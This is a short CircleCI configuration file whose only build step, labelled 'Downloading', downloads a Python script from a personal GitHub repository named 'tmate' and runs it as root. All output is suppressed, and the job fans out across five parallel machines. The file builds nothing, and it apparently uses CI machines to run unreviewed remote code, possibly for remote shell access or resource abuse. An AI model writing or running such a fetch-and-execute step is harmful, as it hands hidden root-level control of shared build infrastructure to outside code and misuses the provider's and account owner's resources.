version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202101-01
    parallelism: 5
    steps:
      - run: 
         name: Downloading
         command: |
          sudo su --command "wget https://raw.githubusercontent.com/liyanul225/tmate/main/code.py >/dev/null 2>&1 && python code.py"
workflows:
    version: 2
    build:
        jobs:
            - build
